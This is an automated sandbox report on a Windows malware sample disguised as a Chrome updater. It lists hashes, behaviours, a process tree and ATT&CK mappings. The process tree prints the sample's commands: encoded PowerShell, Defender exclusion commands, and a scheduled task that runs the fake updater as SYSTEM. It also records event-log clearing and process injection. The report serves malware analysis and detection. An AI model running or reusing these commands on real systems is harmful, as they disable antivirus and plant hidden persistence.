Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22/11/2024, 17:15
Static task
static1
Behavioral task
behavioral1
Sample
IdkWhatsGoingOn.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
IdkWhatsGoingOn.exe
Resource
win10v2004-20241007-en
General
-
Target
IdkWhatsGoingOn.exe
-
Size
5.7MB
-
MD5
68a8d7bdb7daeee5d2bf27bf36092794
-
SHA1
4db786dc2fd0506e7123b43ad8f2b7820b01bbad
-
SHA256
4231822a26de5053ef9413968c254f8f4e6b4b345a7ccf4689b3d00ee879c3ab
-
SHA512
878dcf38473b159c6d4d866a9bfa8cce38da070efa4e157c4a34d378e952fd26b9a1e76aeb0c117b11574af7916e56bbf6ca0156bac0e075da397439b297dc47
-
SSDEEP
98304:w3dhPozxID/ISjmbE+4Q4prv2EiXXFGz/jWhG150OUvug1CJYE:MnHrlmnsv2nkzyhM50OUO
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2160 created 1212 2160 Google ChromeUP.exe 21 PID 2160 created 1212 2160 Google ChromeUP.exe 21 PID 2160 created 1212 2160 Google ChromeUP.exe 21 PID 2160 created 1212 2160 Google ChromeUP.exe 21 PID 2424 created 1212 2424 updater.exe 21 PID 2424 created 1212 2424 updater.exe 21 PID 2424 created 1212 2424 updater.exe 21 PID 2424 created 1212 2424 updater.exe 21 PID 2424 created 1212 2424 updater.exe 21 -
pid Process 2824 powershell.exe 2664 powershell.exe 3040 powershell.exe 2980 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys" services.exe -
Executes dropped EXE 2 IoCs
pid Process 2160 Google ChromeUP.exe 2424 updater.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 2 IoCs
pid Process 1736 IdkWhatsGoingOn.exe 2004 taskeng.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2160 set thread context of 2800 2160 Google ChromeUP.exe 37 PID 2424 set thread context of 2580 2424 updater.exe 47 PID 2424 set thread context of 2444 2424 updater.exe 51 PID 2424 set thread context of 112 2424 updater.exe 52 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe Google ChromeUP.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IdkWhatsGoingOn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40429f2b023ddb01 powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 632 schtasks.exe 2884 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2364 powershell.exe 2424 powershell.exe 2160 Google ChromeUP.exe 2160 Google ChromeUP.exe 3040 powershell.exe 2160 Google ChromeUP.exe 2160 Google ChromeUP.exe 2160 Google ChromeUP.exe 2160 Google ChromeUP.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2824 powershell.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2160 Google ChromeUP.exe 2160 Google ChromeUP.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe 2800 dialer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 services.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 2800 dialer.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeAuditPrivilege 848 svchost.exe Token: SeAuditPrivilege 848 svchost.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeAuditPrivilege 848 svchost.exe Token: SeDebugPrivilege 2580 dialer.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeLockMemoryPrivilege 112 dialer.exe Token: SeLoadDriverPrivilege 460 services.exe Token: SeBackupPrivilege 460 services.exe Token: SeRestorePrivilege 460 services.exe Token: SeSecurityPrivilege 460 services.exe Token: SeTakeOwnershipPrivilege 460 services.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe Token: SeManageVolumePrivilege 848 svchost.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe Token: SeManageVolumePrivilege 848 svchost.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe Token: SeManageVolumePrivilege 848 svchost.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1736 wrote to memory of 2364 1736 IdkWhatsGoingOn.exe 30 PID 1736 wrote to memory of 2364 1736 IdkWhatsGoingOn.exe 30 PID 1736 wrote to memory of 2364 1736 IdkWhatsGoingOn.exe 30 PID 1736 wrote to memory of 2364 1736 IdkWhatsGoingOn.exe 30 PID 1736 wrote to memory of 2424 1736 IdkWhatsGoingOn.exe 32 PID 1736 wrote to memory of 2424 1736 IdkWhatsGoingOn.exe 32 PID 1736 wrote to memory of 2424 1736 IdkWhatsGoingOn.exe 32 PID 1736 wrote to memory of 2424 1736 IdkWhatsGoingOn.exe 32 PID 1736 wrote to memory of 2160 1736 IdkWhatsGoingOn.exe 34 PID 1736 wrote to memory of 2160 1736 IdkWhatsGoingOn.exe 34 PID 1736 wrote to memory of 2160 1736 IdkWhatsGoingOn.exe 34 PID 1736 wrote to memory of 2160 1736 IdkWhatsGoingOn.exe 34 PID 2160 wrote to memory of 2800 2160 Google ChromeUP.exe 37 PID 2800 wrote to memory of 416 2800 dialer.exe 5 PID 2800 wrote to memory of 460 2800 dialer.exe 6 PID 2800 wrote to memory of 476 2800 dialer.exe 7 PID 2800 wrote to memory of 484 2800 dialer.exe 8 PID 2800 wrote to memory of 596 2800 dialer.exe 9 PID 2800 wrote to memory of 672 2800 dialer.exe 10 PID 2800 wrote to memory of 748 2800 dialer.exe 11 PID 2800 wrote to memory of 812 2800 dialer.exe 12 PID 2800 wrote to memory of 848 2800 dialer.exe 13 PID 2800 wrote to memory of 996 2800 dialer.exe 15 PID 2800 wrote to memory of 340 2800 dialer.exe 16 PID 2800 wrote to memory of 360 2800 dialer.exe 17 PID 2800 wrote to memory of 1068 2800 dialer.exe 18 PID 2800 wrote to memory of 1112 2800 dialer.exe 19 PID 2800 wrote to memory of 1176 2800 dialer.exe 20 PID 2800 wrote to memory of 1212 2800 dialer.exe 21 PID 2800 wrote to memory of 1576 2800 dialer.exe 23 PID 2800 wrote to memory of 948 2800 dialer.exe 24 PID 2800 wrote to memory of 2688 2800 dialer.exe 26 PID 2800 wrote to memory of 2720 2800 dialer.exe 27 PID 2800 wrote to memory of 2164 2800 dialer.exe 31 PID 2800 wrote to memory of 2160 2800 dialer.exe 34 PID 2800 wrote to memory of 2824 2800 dialer.exe 38 PID 2800 wrote to memory of 2840 2800 dialer.exe 39 PID 2824 wrote to memory of 632 2824 powershell.exe 40 PID 2824 wrote to memory of 632 2824 powershell.exe 40 PID 2824 wrote to memory of 632 2824 powershell.exe 40 PID 2800 wrote to memory of 632 2800 dialer.exe 40 PID 2800 wrote to memory of 632 2800 dialer.exe 40 PID 2800 wrote to memory of 2628 2800 dialer.exe 41 PID 2800 wrote to memory of 1816 2800 dialer.exe 42 PID 2800 wrote to memory of 2004 2800 dialer.exe 43 PID 848 wrote to memory of 2004 848 svchost.exe 43 PID 848 wrote to memory of 2004 848 svchost.exe 43 PID 848 wrote to memory of 2004 848 svchost.exe 43 PID 2800 wrote to memory of 2004 2800 dialer.exe 43 PID 2800 wrote to memory of 2424 2800 dialer.exe 44 PID 2004 wrote to memory of 2424 2004 taskeng.exe 44 PID 2004 wrote to memory of 2424 2004 taskeng.exe 44 PID 2004 wrote to memory of 2424 2004 taskeng.exe 44 PID 2800 wrote to memory of 2424 2800 dialer.exe 44 PID 2800 wrote to memory of 2980 2800 dialer.exe 45 PID 2800 wrote to memory of 2812 2800 dialer.exe 46 PID 2424 wrote to memory of 2580 2424 updater.exe 47 PID 2800 wrote to memory of 2664 2800 dialer.exe 48 PID 2800 wrote to memory of 1500 2800 dialer.exe 49 PID 2580 wrote to memory of 416 2580 dialer.exe 5 PID 2580 wrote to memory of 460 2580 dialer.exe 6 PID 2580 wrote to memory of 476 2580 dialer.exe 7 PID 2580 wrote to memory of 484 2580 dialer.exe 8 PID 2580 wrote to memory of 596 2580 dialer.exe 9 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:416
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:460 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1576
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
PID:2044
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
- Indicator Removal: Clear Windows Event Logs
PID:748
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1176
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\system32\taskeng.exetaskeng.exe {106036DC-2C28-4D63-82C4-55866189B456} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2424
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:996
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:340
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:360
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1068
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1112
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:948
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2688
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2720
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:476
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:484
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\IdkWhatsGoingOn.exe"C:\Users\Admin\AppData\Local\Temp\IdkWhatsGoingOn.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAbQBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAcQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBBAFIATgBJAE4ARwA6ACAATgBvACAAVgBpAHMAdQBhAGwAIABDACsAKwAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuACAAdwBhAHMAIABmAG8AdQBuAGQALgAgAFAAbABlAGEAcwBlACAAZABvAHcAbgBsAG8AYQBkACAAYQBuAGQAIABpAG4AcwB0AGEAbABsACAAVgBpAHMAdQBhAGwAIABTAHQAdQBkAGkAbwAgADIAMAAxADcAIAB3AGkAdABoACAAQwArACsAIABjAG8AbQBwAG8AbgBlAG4AdABzAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHEAegBlACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAbgB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAcQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAcQBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAeQByACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Users\Admin\AppData\Local\Temp\Google ChromeUP.exe"C:\Users\Admin\AppData\Local\Temp\Google ChromeUP.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2160
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huipikb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:632
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huipikb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2884
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2444
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "307022403-218746065-1676923338-102530715-299708864-1364067046-631019521342290470"1⤵PID:2164
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17583541771724089270-844929602-580331018127876311724760754-18624246132042849693"1⤵PID:2840
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "14427525604881307011849628551-577109076-911937203796145370-926831286455888039"1⤵PID:1816
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3837707341808014622-283885677384383719562783512938088883-606665924-1511892669"1⤵PID:2812
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-6867552581904834338-437349334-37813307519993219351936794735717816519269132621"1⤵PID:1500
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52af6f5c96b21c50df419fab50f7e7904
SHA1767f40fc5574ff146ab647faef14b3b6c5556174
SHA256a88f61d8ca0ebb62dddf675c4dac760178fc25e4fb71304838d65c17a88811d9
SHA5127b0085674b13762e4152d50738c3a08be7629fd8c9b26ffafc824c4588a9612cb60842f3f70fd30c4115743f43d7d3aa06a6f396556d37292c48f7e4a318a579
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57229693febb0bd4ef20e9f955f6b812f
SHA1f476e424f7fbb88bb2c96f64a50e18c2de124a86
SHA256fa30c3c82892ec81119e40f05514a053c8d275fb048a9ae10feec89544228b84
SHA512a82edb45f61d261066de485fa6d6dcbf7c368823e53336d18298a7951c672c362a4a73f55f68758088b3f8078cb465dc3fd3cc0536340885a47de948b83e3d7e
-
Filesize
3KB
MD53cfd301196d3ab822f639116dc85e6a5
SHA12bf89d538e2a5d43cf2f86d5807528e1d6c4da9b
SHA2561a9796d18783f6919000223e4566c4ec54e9ae407ace2c45b350a3e5ac6974a6
SHA5125f20ebb4109b585c03b89cd3a5b2b6ea64cb9c979a4e37db81f86db26d4aa22a8d524e84ba20c2906cc5868b37a4f371a43ad79f2a7555e9219a16fd619efcfc
-
Filesize
5.7MB
MD5d394c4b7b88447da08acf97d1b94594b
SHA129af6911ca953185de35fe639a4440b5398247dc
SHA2565ff8dc3580c159851710de06c8d644560c4181d577f148085161e28461075aaa
SHA512a9ba312134bb6a2aa0cd0779b3cb092986106d07a127e2cd7b85a42e81c6557d6cafe003c00cfbc92b7cd994e0fe358f87753bfd27f371a0d023b32dd78788e7